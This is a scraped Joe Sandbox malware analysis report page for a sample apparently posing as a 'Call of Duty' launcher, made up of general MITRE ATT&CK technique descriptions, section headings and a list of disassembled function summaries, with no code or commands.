Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Call 0f Duty A1 Launcher.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
Call 0f Duty A1 Launcher.exe

Function 006DB18D Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Function 006C9DD3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Function 006BBEB0 Relevance: 9.2, APIs: 6, Instructions: 173
fileCOMMON

Function 006C6CE6 Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Function 006C6FEF Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Function 006C41C6 Relevance: 3.1, APIs: 2, Instructions: 93
COMMONLIBRARYCODE

Function 006CA732 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 006C6E00 Relevance: 3.0, APIs: 2, Instructions: 38
threadCOMMON

Function 006CB0CB Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Function 006C3B60 Relevance: 1.6, APIs: 1, Instructions: 86
COMMON

Function 006C9E9E Relevance: 1.6, APIs: 1, Instructions: 56
COMMONLIBRARYCODE

Function 006BCD90 Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Function 006CBC45 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre